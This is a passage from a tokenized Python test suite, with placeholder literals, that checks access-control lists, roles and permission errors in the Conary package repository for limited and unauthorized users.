getNameVersionFlavor ( ) ] ) <EOL> assert ( { } . fromkeys ( repos . troveNames ( branchLabel ) ) == <EOL> { } . fromkeys ( both ) ) <EOL> assert ( limitedRepos . troveNames ( branchLabel ) == runtime ) <EOL> assert ( { } . fromkeys ( branchRepos . troveNames ( branchLabel ) ) == <EOL> { } . fromkeys ( both ) ) <EOL> assert ( runtimeRepos . troveNames ( branchLabel ) == runtime ) <EOL> assert ( taRepos . troveNames ( rootLabel ) == runtime ) <EOL> full = { '<STR_LIT>' : <EOL> [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> '<STR_LIT>' : <EOL> [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> '<STR_LIT>' : <EOL> [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> } <EOL> d = repos . getTroveVersionList ( '<STR_LIT:localhost>' , <EOL> { '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None } ) <EOL> self . cmpTroveVersionList ( d , full ) <EOL> d = repos . getTroveVersionList ( '<STR_LIT:localhost>' , { None : None } ) <EOL> self . cmpTroveVersionList ( d , full ) <EOL> d = limitedRepos . getTroveVersionList ( '<STR_LIT:localhost>' , <EOL> { '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None } ) <EOL> self . cmpTroveVersionList ( d , { '<STR_LIT>' : <EOL> full [ '<STR_LIT>' ] [ <NUM_LIT:0> : <NUM_LIT:1> ] } ) <EOL> d = branchRepos . getTroveVersionList ( '<STR_LIT:localhost>' , { None : None } ) <EOL> self . cmpTroveVersionList ( d , { '<STR_LIT>' : <EOL> full [ '<STR_LIT>' ] [ <NUM_LIT:0> : <NUM_LIT:1> ] , <EOL> '<STR_LIT>' : <EOL> full [ '<STR_LIT>' ] [ <NUM_LIT:0> : <NUM_LIT:1> ] , <EOL> '<STR_LIT>' : <EOL> full [ '<STR_LIT>' ] [ <NUM_LIT:1> : <NUM_LIT:3> ] } ) <EOL> d = runtimeRepos . getTroveVersionList ( '<STR_LIT:localhost>' , { None : None } ) <EOL> self . cmpTroveVersionList ( d , { '<STR_LIT>' : <EOL> full [ '<STR_LIT>' ] } ) <EOL> d = repeatRepos . getTroveVersionList ( '<STR_LIT:localhost>' , { None : None } ) <EOL> self . 
cmpTroveVersionList ( d , { '<STR_LIT>' : <EOL> full [ '<STR_LIT>' ] } ) <EOL> d = taRepos . getTroveVersionList ( '<STR_LIT:localhost>' , { None : None } ) <EOL> self . cmpTroveVersionList ( d , { '<STR_LIT>' : <EOL> full [ '<STR_LIT>' ] } ) <EOL> full = { '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] <EOL> } <EOL> q = { None : { self . cfg . buildLabel : None } } <EOL> d = repos . getTroveVersionsByLabel ( q ) <EOL> self . cmpTroveVersionList ( d , full ) <EOL> d = limitedRepos . getTroveVersionsByLabel ( q ) <EOL> assert ( d == { } ) <EOL> d = branchRepos . getTroveVersionsByLabel ( q ) <EOL> assert ( d == { } ) <EOL> d = runtimeRepos . getTroveVersionsByLabel ( q ) <EOL> self . cmpTroveVersionList ( d , <EOL> { '<STR_LIT>' : full [ '<STR_LIT>' ] } ) <EOL> d = repeatRepos . getTroveVersionsByLabel ( q ) <EOL> self . cmpTroveVersionList ( d , <EOL> { '<STR_LIT>' : full [ '<STR_LIT>' ] } ) <EOL> d = taRepos . getTroveVersionsByLabel ( q ) <EOL> self . cmpTroveVersionList ( d , <EOL> { '<STR_LIT>' : full [ '<STR_LIT>' ] } ) <EOL> full = { '<STR_LIT>' : <EOL> [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : <EOL> [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : <EOL> [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> } <EOL> q = { None : { branchLabel : None } } <EOL> d = repos . getTroveVersionsByLabel ( q ) <EOL> self . cmpTroveVersionList ( d , full ) <EOL> d = limitedRepos . getTroveVersionsByLabel ( q ) <EOL> self . cmpTroveVersionList ( d , <EOL> { '<STR_LIT>' : full [ '<STR_LIT>' ] } ) <EOL> d = branchRepos . getTroveVersionsByLabel ( q ) <EOL> self . cmpTroveVersionList ( d , full ) <EOL> d = runtimeRepos . getTroveVersionsByLabel ( q ) <EOL> self . cmpTroveVersionList ( d , <EOL> { '<STR_LIT>' : full [ '<STR_LIT>' ] } ) <EOL> d = repeatRepos . getTroveVersionsByLabel ( q ) <EOL> self . cmpTroveVersionList ( d , <EOL> { '<STR_LIT>' : full [ '<STR_LIT>' ] } ) <EOL> d = taRepos . getTroveVersionsByLabel ( q ) <EOL> self . 
cmpTroveVersionList ( d , <EOL> { '<STR_LIT>' : full [ '<STR_LIT>' ] } ) <EOL> full = { '<STR_LIT>' : <EOL> [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' : <EOL> [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' : <EOL> [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> } <EOL> d = repos . getAllTroveLeaves ( '<STR_LIT:localhost>' , { None : None } ) <EOL> self . cmpTroveVersionList ( d , full ) <EOL> d = limitedRepos . getAllTroveLeaves ( '<STR_LIT:localhost>' , { None : None } ) <EOL> self . cmpTroveVersionList ( d , <EOL> { '<STR_LIT>' : full [ '<STR_LIT>' ] [ <NUM_LIT:0> : <NUM_LIT:1> ] } ) <EOL> d = branchRepos . getAllTroveLeaves ( '<STR_LIT:localhost>' , { None : None } ) <EOL> self . cmpTroveVersionList ( d , <EOL> { '<STR_LIT>' : full [ '<STR_LIT>' ] [ <NUM_LIT:0> : <NUM_LIT:1> ] , <EOL> '<STR_LIT>' : full [ '<STR_LIT>' ] [ <NUM_LIT:0> : <NUM_LIT:1> ] , <EOL> '<STR_LIT>' : full [ '<STR_LIT>' ] [ <NUM_LIT:1> : <NUM_LIT:2> ] , <EOL> } ) <EOL> d = runtimeRepos . getAllTroveLeaves ( '<STR_LIT:localhost>' , { None : None } ) <EOL> self . cmpTroveVersionList ( d , <EOL> { '<STR_LIT>' : full [ '<STR_LIT>' ] } ) <EOL> d = taRepos . getAllTroveLeaves ( '<STR_LIT:localhost>' , { None : None } ) <EOL> self . cmpTroveVersionList ( d , <EOL> { '<STR_LIT>' : full [ '<STR_LIT>' ] } ) <EOL> full = { '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> } <EOL> qd = { None : { self . cfg . buildLabel : None } } <EOL> d = repos . getTroveLeavesByLabel ( qd ) <EOL> self . cmpTroveVersionList ( d , full ) <EOL> d = limitedRepos . getTroveLeavesByLabel ( qd ) <EOL> assert ( d == { } ) <EOL> d = branchRepos . getTroveLeavesByLabel ( qd ) <EOL> assert ( d == { } ) <EOL> d = runtimeRepos . getTroveLeavesByLabel ( qd ) <EOL> self . cmpTroveVersionList ( d , <EOL> { '<STR_LIT>' : full [ '<STR_LIT>' ] } ) <EOL> d = repeatRepos . getTroveLeavesByLabel ( qd ) <EOL> self . 
cmpTroveVersionList ( d , <EOL> { '<STR_LIT>' : full [ '<STR_LIT>' ] } ) <EOL> d = taRepos . getTroveLeavesByLabel ( qd ) <EOL> self . cmpTroveVersionList ( d , <EOL> { '<STR_LIT>' : full [ '<STR_LIT>' ] } ) <EOL> full = { '<STR_LIT>' : <EOL> [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : <EOL> [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : <EOL> [ '<STR_LIT>' ] , <EOL> } <EOL> qd = { None : { branchLabel : None } } <EOL> d = repos . getTroveLeavesByLabel ( qd ) <EOL> self . cmpTroveVersionList ( d , full ) <EOL> d = limitedRepos . getTroveLeavesByLabel ( qd ) <EOL> self . cmpTroveVersionList ( d , <EOL> { '<STR_LIT>' : full [ '<STR_LIT>' ] } ) <EOL> d = branchRepos . getTroveLeavesByLabel ( qd ) <EOL> self . cmpTroveVersionList ( d , full ) <EOL> d = runtimeRepos . getTroveLeavesByLabel ( qd ) <EOL> self . cmpTroveVersionList ( d , <EOL> { '<STR_LIT>' : full [ '<STR_LIT>' ] } ) <EOL> d = repeatRepos . getTroveLeavesByLabel ( qd ) <EOL> self . cmpTroveVersionList ( d , <EOL> { '<STR_LIT>' : full [ '<STR_LIT>' ] } ) <EOL> d = taRepos . getTroveLeavesByLabel ( qd ) <EOL> self . cmpTroveVersionList ( d , <EOL> { '<STR_LIT>' : full [ '<STR_LIT>' ] } ) <EOL> q = { '<STR_LIT>' : { branchVersion : None } , <EOL> '<STR_LIT>' : { rootBranch : None } <EOL> } <EOL> full = { '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] <EOL> } <EOL> d = repos . getTroveLeavesByBranch ( q ) <EOL> self . cmpTroveVersionList ( d , full ) <EOL> d = limitedRepos . getTroveLeavesByBranch ( q ) <EOL> assert ( d == { } ) <EOL> d = branchRepos . getTroveLeavesByBranch ( q ) <EOL> self . cmpTroveVersionList ( d , { '<STR_LIT>' : full [ '<STR_LIT>' ] } ) <EOL> d = runtimeRepos . getTroveLeavesByBranch ( q ) <EOL> self . cmpTroveVersionList ( d , <EOL> { '<STR_LIT>' : full [ '<STR_LIT>' ] } ) <EOL> d = repeatRepos . getTroveLeavesByBranch ( q ) <EOL> self . cmpTroveVersionList ( d , <EOL> { '<STR_LIT>' : full [ '<STR_LIT>' ] } ) <EOL> d = taRepos . getTroveLeavesByBranch ( q ) <EOL> self . 
cmpTroveVersionList ( d , <EOL> { '<STR_LIT>' : full [ '<STR_LIT>' ] } ) <EOL> q = { '<STR_LIT>' : { branchVersion : None } , <EOL> '<STR_LIT>' : { rootBranch : None } <EOL> } <EOL> full = { '<STR_LIT>' : <EOL> [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : <EOL> [ '<STR_LIT>' ] , <EOL> } <EOL> d = repos . getTroveVersionsByBranch ( q ) <EOL> self . cmpTroveVersionList ( d , full ) <EOL> d = limitedRepos . getTroveVersionsByBranch ( q ) <EOL> assert ( d == { } ) <EOL> d = branchRepos . getTroveVersionsByBranch ( q ) <EOL> self . cmpTroveVersionList ( d , { '<STR_LIT>' : full [ '<STR_LIT>' ] } ) <EOL> d = runtimeRepos . getTroveVersionsByBranch ( q ) <EOL> self . cmpTroveVersionList ( d , <EOL> { '<STR_LIT>' : full [ '<STR_LIT>' ] } ) <EOL> d = repeatRepos . getTroveVersionsByBranch ( q ) <EOL> self . cmpTroveVersionList ( d , <EOL> { '<STR_LIT>' : full [ '<STR_LIT>' ] } ) <EOL> d = taRepos . getTroveVersionsByBranch ( q ) <EOL> self . cmpTroveVersionList ( d , <EOL> { '<STR_LIT>' : full [ '<STR_LIT>' ] } ) <EOL> versionList = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , ] <EOL> versionDict = { } . fromkeys ( [ versions . VersionFromString ( x ) for x in <EOL> versionList ] , [ None ] ) <EOL> q = { '<STR_LIT>' : versionDict , <EOL> '<STR_LIT>' : versionDict <EOL> } <EOL> full = { '<STR_LIT>' : versionList , <EOL> '<STR_LIT>' : versionList , <EOL> } <EOL> d = repos . getTroveVersionFlavors ( q ) <EOL> self . cmpTroveVersionList ( d , full ) <EOL> d = limitedRepos . getTroveVersionFlavors ( q ) <EOL> self . cmpTroveVersionList ( d , { '<STR_LIT>' : versionList [ <NUM_LIT:0> : <NUM_LIT:1> ] } ) <EOL> d = branchRepos . getTroveVersionFlavors ( q ) <EOL> self . cmpTroveVersionList ( d , { '<STR_LIT>' : versionList [ <NUM_LIT:0> : <NUM_LIT:1> ] , <EOL> '<STR_LIT>' : versionList [ <NUM_LIT:0> : <NUM_LIT:1> ] } ) <EOL> d = runtimeRepos . getTroveVersionFlavors ( q ) <EOL> self . cmpTroveVersionList ( d , <EOL> { '<STR_LIT>' : full [ '<STR_LIT>' ] } ) <EOL> d = repeatRepos . 
getTroveVersionFlavors ( q ) <EOL> self . cmpTroveVersionList ( d , <EOL> { '<STR_LIT>' : full [ '<STR_LIT>' ] } ) <EOL> d = taRepos . getTroveVersionFlavors ( q ) <EOL> self . cmpTroveVersionList ( d , <EOL> { '<STR_LIT>' : full [ '<STR_LIT>' ] } ) <EOL> flavor = deps . Flavor ( ) <EOL> if use . Arch . x86 : <EOL> flavor . addDep ( deps . InstructionSetDependency , <EOL> deps . Dependency ( '<STR_LIT>' , <EOL> [ ( '<STR_LIT>' , deps . FLAG_SENSE_REQUIRED ) ] ) ) <EOL> elif use . Arch . x86_64 : <EOL> pass <EOL> else : <EOL> raise NotImplementedError , '<STR_LIT>' <EOL> versionDict = { } . fromkeys ( [ versions . VersionFromString ( x ) for x in <EOL> versionList ] , [ flavor ] ) <EOL> q = { '<STR_LIT>' : versionDict , <EOL> '<STR_LIT>' : versionDict <EOL> } <EOL> d = repos . getTroveVersionFlavors ( q ) <EOL> self . cmpTroveVersionList ( d , full ) <EOL> all = repos . getTroveVersionList ( '<STR_LIT:localhost>' , { None : None } ) <EOL> all = list ( self . asSet ( all ) ) <EOL> troves = dict ( itertools . izip ( all , repos . getTroves ( all ) ) ) <EOL> for testRepos in ( limitedRepos , branchRepos , repeatRepos ) : <EOL> canSee = testRepos . getTroveVersionList ( '<STR_LIT:localhost>' , { None : None } ) <EOL> canSee = self . asSet ( canSee ) <EOL> isPresent = testRepos . hasTroves ( all ) <EOL> for trvInfo in all : <EOL> if trvInfo == '<STR_LIT>' : <EOL> files = [ ( x [ <NUM_LIT:0> ] , x [ <NUM_LIT:2> ] , x [ <NUM_LIT:3> ] ) for x in <EOL> troves [ trvInfo ] . iterFileList ( ) ] <EOL> else : <EOL> files = '<STR_LIT>' <EOL> if trvInfo in canSee : <EOL> assert ( isPresent [ trvInfo ] ) <EOL> testRepos . getTrove ( * trvInfo ) <EOL> if files : <EOL> testRepos . getFileVersions ( files ) <EOL> testRepos . getFileContents ( [ x [ <NUM_LIT:1> : <NUM_LIT:3> ] for x in files ] ) <EOL> else : <EOL> assert ( not isPresent [ trvInfo ] ) <EOL> self . assertRaises ( errors . InsufficientPermission , <EOL> testRepos . getTrove , * trvInfo ) <EOL> if files : <EOL> self . 
assertRaises ( errors . FileStreamMissing , <EOL> testRepos . getFileVersions , files ) <EOL> self . assertRaises ( errors . FileStreamNotFound , <EOL> testRepos . getFileContents , <EOL> [ x [ <NUM_LIT:1> : <NUM_LIT:3> ] for x in files ] ) <EOL> new = testRepos . getNewTroveList ( '<STR_LIT:localhost>' , <NUM_LIT:0> ) <EOL> assert ( canSee == set ( [ x [ <NUM_LIT:1> ] for x in new ] ) ) <EOL> all = repos . getTroveVersionList ( '<STR_LIT:localhost>' , { None : None } ) <EOL> del all [ "<STR_LIT>" ] <EOL> all = list ( self . asSet ( all ) ) <EOL> troves = dict ( itertools . izip ( all , repos . getTroves ( all ) ) ) <EOL> infos = dict ( itertools . izip ( all , repos . getTroveInfo ( <EOL> trove . _TROVEINFO_TAG_SOURCENAME , all ) ) ) <EOL> for trv in all : <EOL> assert ( troves [ trv ] . troveInfo . sourceName == infos [ trv ] ) <EOL> infos = dict ( itertools . izip ( all , repos . getTroveInfo ( <EOL> trove . _TROVEINFO_TAG_SIGS , all ) ) ) <EOL> for trv in all : <EOL> assert ( troves [ trv ] . troveInfo . sigs == infos [ trv ] ) <EOL> self . assertRaises ( errors . TroveMissing , limitedRepos . getTroveInfo , <EOL> trove . _TROVEINFO_TAG_SOURCENAME , all ) <EOL> all . append ( ( '<STR_LIT>' , versions . VersionFromString ( '<STR_LIT>' ) , <EOL> deps . Flavor ( ) ) ) <EOL> self . assertRaises ( errors . TroveMissing , repos . getTroveInfo , <EOL> trove . _TROVEINFO_TAG_SOURCENAME , all ) <EOL> d = taRepos . getTroveVersionList ( '<STR_LIT:localhost>' , { None : None } ) <EOL> for i in taRepos . getTroveInfo ( trove . _TROVEINFO_TAG_SOURCENAME , list ( self . asSet ( d ) ) ) : <EOL> self . assertEqual ( i ( ) , "<STR_LIT>" ) <EOL> def testCompoundAcls ( self ) : <EOL> rootLabel = versions . Label ( "<STR_LIT>" ) <EOL> branchLabel = versions . Label ( "<STR_LIT>" ) <EOL> rootBranch = versions . VersionFromString ( '<STR_LIT>' ) <EOL> self . makeSourceTrove ( '<STR_LIT>' , recipes . testSuiteRecipe ) <EOL> self . build ( recipes . 
testSuiteRecipe , "<STR_LIT>" ) <EOL> self . makeSourceTrove ( '<STR_LIT>' , recipes . doubleRecipe1 ) <EOL> self . build ( recipes . doubleRecipe1 , "<STR_LIT>" ) <EOL> repos = self . getRepositoryClient ( ) <EOL> repos . deleteUserByName ( self . cfg . buildLabel , '<STR_LIT>' ) <EOL> repeatRepos = self . setupUser ( repos , rootLabel , '<STR_LIT>' , '<STR_LIT:bar>' , <EOL> '<STR_LIT>' , None ) <EOL> repos . addAcl ( rootLabel , '<STR_LIT>' , '<STR_LIT>' , None ) <EOL> repos . addAcl ( rootLabel , '<STR_LIT>' , '<STR_LIT>' , None ) <EOL> repos . addAcl ( rootLabel , '<STR_LIT>' , '<STR_LIT>' , None ) <EOL> full = { '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] <EOL> } <EOL> qd = { None : { self . cfg . buildLabel : None } } <EOL> d = repos . getTroveLeavesByLabel ( qd ) <EOL> self . cmpTroveVersionList ( d , full ) <EOL> d = repeatRepos . getTroveLeavesByLabel ( qd ) <EOL> self . cmpTroveVersionList ( d , <EOL> { <EOL> '<STR_LIT>' : full [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : full [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : full [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : full [ '<STR_LIT>' ] , <EOL> } ) <EOL> def testAclChanges ( self ) : <EOL> rootLabel = versions . Label ( "<STR_LIT>" ) <EOL> branchLabel = versions . Label ( "<STR_LIT>" ) <EOL> rootBranch = versions . VersionFromString ( '<STR_LIT>' ) <EOL> self . makeSourceTrove ( '<STR_LIT>' , recipes . doubleRecipe1 ) <EOL> self . build ( recipes . doubleRecipe1 , "<STR_LIT>" ) <EOL> repos = self . getRepositoryClient ( ) <EOL> repos . deleteUserByName ( self . cfg . buildLabel , '<STR_LIT>' ) <EOL> limitedRepos = self . 
setupUser ( repos , rootLabel , '<STR_LIT>' , '<STR_LIT:bar>' , <EOL> '<STR_LIT>' , branchLabel ) <EOL> both = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> runtime = [ '<STR_LIT>' ] <EOL> assert ( limitedRepos . troveNames ( branchLabel ) == [ ] ) <EOL> self . mkbranch ( self . cfg . buildLabel , branchLabel , '<STR_LIT>' ) <EOL> branchVersion = versions . VersionFromString ( <EOL> '<STR_LIT>' ) <EOL> oldLabel = self . cfg . buildLabel <EOL> self . cfg . buildLabel = branchLabel <EOL> self . updateSourceTrove ( '<STR_LIT>' , recipes . doubleRecipe1_1 ) <EOL> double1_1 = self . build ( recipes . doubleRecipe1_1 , "<STR_LIT>" ) <EOL> self . cfg . buildLabel = oldLabel <EOL> assert ( limitedRepos . troveNames ( branchLabel ) == runtime ) <EOL> full = { '<STR_LIT>' : <EOL> [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> '<STR_LIT>' : <EOL> [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> '<STR_LIT>' : <EOL> [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> } <EOL> d = limitedRepos . getTroveVersionList ( '<STR_LIT:localhost>' , <EOL> { '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None } ) <EOL> self . cmpTroveVersionList ( d , { '<STR_LIT>' : <EOL> full [ '<STR_LIT>' ] [ <NUM_LIT:0> : <NUM_LIT:1> ] } ) <EOL> try : <EOL> limitedRepos . editAcl ( rootLabel , '<STR_LIT>' , '<STR_LIT>' , branchLabel , None , None , False ) <EOL> except errors . InsufficientPermission : <EOL> pass <EOL> else : <EOL> assert ( <NUM_LIT:0> ) <EOL> repos . editAcl ( rootLabel , '<STR_LIT>' , '<STR_LIT>' , branchLabel , None , <EOL> None , False ) <EOL> d = limitedRepos . getTroveVersionList ( '<STR_LIT:localhost>' , <EOL> { '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None } ) <EOL> self . cmpTroveVersionList ( d , full ) <EOL> assert repos . listAcls ( rootLabel , '<STR_LIT>' ) == [ <EOL> dict ( label = '<STR_LIT>' , item = '<STR_LIT>' , canWrite = <NUM_LIT:0> , canRemove = <NUM_LIT:0> ) ] <EOL> repos . 
deleteAcl ( rootLabel , '<STR_LIT>' , None , None ) <EOL> assert repos . listAcls ( rootLabel , '<STR_LIT>' ) == [ ] <EOL> d = limitedRepos . getTroveVersionList ( '<STR_LIT:localhost>' , <EOL> { '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None } ) <EOL> self . cmpTroveVersionList ( d , { } ) <EOL> repos . addAcl ( rootLabel , '<STR_LIT>' , '<STR_LIT>' , branchLabel ) <EOL> assert repos . listAcls ( rootLabel , '<STR_LIT>' ) == [ <EOL> dict ( label = branchLabel . asString ( ) , item = '<STR_LIT>' , canWrite = <NUM_LIT:0> , <EOL> canRemove = <NUM_LIT:0> ) ] <EOL> d = limitedRepos . getTroveVersionList ( '<STR_LIT:localhost>' , <EOL> { '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None } ) <EOL> self . cmpTroveVersionList ( d , { '<STR_LIT>' : <EOL> full [ '<STR_LIT>' ] [ <NUM_LIT:0> : <NUM_LIT:1> ] } ) <EOL> repos . deleteAcl ( rootLabel , '<STR_LIT>' , '<STR_LIT>' , branchLabel ) <EOL> assert repos . listAcls ( rootLabel , '<STR_LIT>' ) == [ ] <EOL> d = limitedRepos . getTroveVersionList ( '<STR_LIT:localhost>' , <EOL> { '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None } ) <EOL> self . cmpTroveVersionList ( d , { } ) <EOL> repos . addAcl ( rootLabel , '<STR_LIT>' , '<STR_LIT>' , branchLabel . asString ( ) ) <EOL> assert repos . listAcls ( rootLabel , '<STR_LIT>' ) == [ <EOL> dict ( label = branchLabel . asString ( ) , item = '<STR_LIT>' , canWrite = <NUM_LIT:0> , <EOL> canRemove = <NUM_LIT:0> ) ] <EOL> d = limitedRepos . getTroveVersionList ( '<STR_LIT:localhost>' , <EOL> { '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None } ) <EOL> self . cmpTroveVersionList ( d , { '<STR_LIT>' : <EOL> full [ '<STR_LIT>' ] [ <NUM_LIT:0> : <NUM_LIT:1> ] } ) <EOL> repos . editAcl ( rootLabel , '<STR_LIT>' , '<STR_LIT>' , branchLabel , <EOL> '<STR_LIT>' , '<STR_LIT>' , False , False ) <EOL> d = limitedRepos . 
getTroveVersionList ( '<STR_LIT:localhost>' , <EOL> { '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None } ) <EOL> self . cmpTroveVersionList ( d , full ) <EOL> repos . deleteAcl ( rootLabel , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> assert repos . listAcls ( rootLabel , '<STR_LIT>' ) == [ ] <EOL> d = limitedRepos . getTroveVersionList ( '<STR_LIT:localhost>' , <EOL> { '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None } ) <EOL> self . cmpTroveVersionList ( d , { } ) <EOL> def testGetRoles ( self ) : <EOL> repos = self . openRepository ( ) <EOL> repos = self . getRepositoryClient ( ) <EOL> l = versions . Label ( "<STR_LIT>" ) <EOL> assert set ( repos . listRoles ( l ) ) == set ( [ '<STR_LIT:test>' , '<STR_LIT>' ] ) <EOL> assert ( repos . getRoles ( l ) == [ '<STR_LIT:test>' ] ) <EOL> repos . addRole ( l , '<STR_LIT>' ) <EOL> assert set ( repos . listRoles ( l ) ) == set ( [ '<STR_LIT:test>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> repos . updateRoleMembers ( l , '<STR_LIT>' , [ '<STR_LIT:test>' ] ) <EOL> assert ( repos . getRoles ( l ) == [ '<STR_LIT:test>' , '<STR_LIT>' ] ) <EOL> repos . updateRoleMembers ( l , '<STR_LIT>' , [ ] ) <EOL> assert ( repos . getRoles ( l ) == [ '<STR_LIT:test>' ] ) <EOL> repos . addRoleMember ( l , '<STR_LIT>' , '<STR_LIT:test>' ) <EOL> self . assertEqual ( repos . getRoles ( l ) , [ '<STR_LIT:test>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( repos . getRoleMembers ( l , '<STR_LIT>' ) , [ '<STR_LIT:test>' ] ) <EOL> repos . updateRoleMembers ( l , '<STR_LIT>' , [ ] ) <EOL> self . assertEqual ( repos . getRoleMembers ( l , '<STR_LIT>' ) , [ ] ) <EOL> repos . updateRoleMembers ( l , '<STR_LIT>' , [ '<STR_LIT:test>' ] ) <EOL> repos . deleteRole ( l , '<STR_LIT>' ) <EOL> assert set ( repos . listRoles ( l ) ) == set ( [ '<STR_LIT:test>' , '<STR_LIT>' ] ) <EOL> assert ( repos . getRoles ( l ) == [ '<STR_LIT:test>' ] ) <EOL> def testBadUser ( self ) : <EOL> repos = self . 
openRepository ( ) <EOL> repos = self . getRepositoryClient ( user = '<STR_LIT:foo>' , password = '<STR_LIT:bar>' ) <EOL> self . addComponent ( '<STR_LIT>' , '<STR_LIT:1.0>' ) <EOL> results = repos . getTroveVersionList ( '<STR_LIT:localhost>' , { None : None } ) <EOL> assert ( '<STR_LIT>' in results ) <EOL> def testBadTrovepattern ( self ) : <EOL> repos = self . openRepository ( ) <EOL> user = '<STR_LIT:foo>' <EOL> l = versions . Label ( "<STR_LIT>" ) <EOL> self . addUserAndRole ( repos , l , user , '<STR_LIT:bar>' ) <EOL> self . assertRaises ( errors . InvalidRegex , <EOL> repos . addAcl , l , user , '<STR_LIT:*>' , '<STR_LIT>' , False , False ) <EOL> repos . addAcl ( l , user , '<STR_LIT>' , '<STR_LIT>' , False , False ) <EOL> self . assertRaises ( errors . InvalidRegex , <EOL> repos . editAcl , l , user , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:*>' , '<STR_LIT>' , <EOL> False , False ) <EOL> def testBadUserTriesToCommit ( self ) : <EOL> user = '<STR_LIT>' <EOL> password = '<STR_LIT:bar>' <EOL> bl = self . cfg . buildLabel <EOL> repos = self . openRepository ( ) <EOL> self . addUserAndRole ( repos , bl , user , password ) <EOL> repos . addAcl ( bl , user , '<STR_LIT>' , bl , False , False ) <EOL> repos . addAcl ( bl , user , '<STR_LIT>' , bl , True , False ) <EOL> limitedRepos = self . getRepositoryClient ( user = user , <EOL> password = password ) <EOL> self . assertRaises ( errors . InsufficientPermission , self . addComponent , <EOL> "<STR_LIT>" , "<STR_LIT>" , repos = limitedRepos ) <EOL> def testFallbackThenNeedUser ( self ) : <EOL> user = '<STR_LIT>' <EOL> password = '<STR_LIT>' <EOL> bl = self . cfg . buildLabel <EOL> repos = self . openRepository ( ) <EOL> self . addUserAndRole ( repos , bl , user , password ) <EOL> repos . addAcl ( bl , user , '<STR_LIT>' , bl , write = True ) <EOL> trv = self . addComponent ( '<STR_LIT>' , '<STR_LIT:1.0>' ) <EOL> limitedRepos = self . 
getRepositoryClient ( user = user , <EOL> password = password ) <EOL> assert ( limitedRepos . getTrove ( * trv . getNameVersionFlavor ( ) ) ) <EOL> self . addComponent ( "<STR_LIT>" , "<STR_LIT:1.0>" , repos = limitedRepos ) <EOL> self . assertRaises ( errors . InsufficientPermission , self . addComponent , <EOL> "<STR_LIT>" , "<STR_LIT:1.0>" , repos = limitedRepos ) <EOL> def testNonExistingUserTriesToCommit ( self ) : <EOL> user = '<STR_LIT>' <EOL> password = '<STR_LIT:bar>' <EOL> repos = self . openRepository ( ) <EOL> limited = self . getRepositoryClient ( user = user , <EOL> password = password ) <EOL> self . assertRaises ( errors . InsufficientPermission , self . addComponent , <EOL> "<STR_LIT>" , "<STR_LIT>" , repos = limited ) <EOL> def testUserPasswordQuoting ( self ) : <EOL> repos = self . openRepository ( ) <EOL> user = '<STR_LIT:foo>' <EOL> password = '<STR_LIT>' <EOL> bl = self . cfg . buildLabel <EOL> self . addUserAndRole ( repos , bl , user , password ) <EOL> repos . addAcl ( bl , user , '<STR_LIT>' , bl , False , False ) <EOL> repos . addAcl ( bl , user , '<STR_LIT>' , bl , True , False ) <EOL> limitedRepos = self . getRepositoryClient ( user = user , <EOL> password = password ) <EOL> self . addComponent ( "<STR_LIT>" , "<STR_LIT>" , repos = limitedRepos ) <EOL> l = repos . getTroveVersionList ( '<STR_LIT:localhost>' , { None : None } ) <EOL> assert ( l . keys ( ) == [ '<STR_LIT>' ] ) <EOL> @ testhelp . context ( 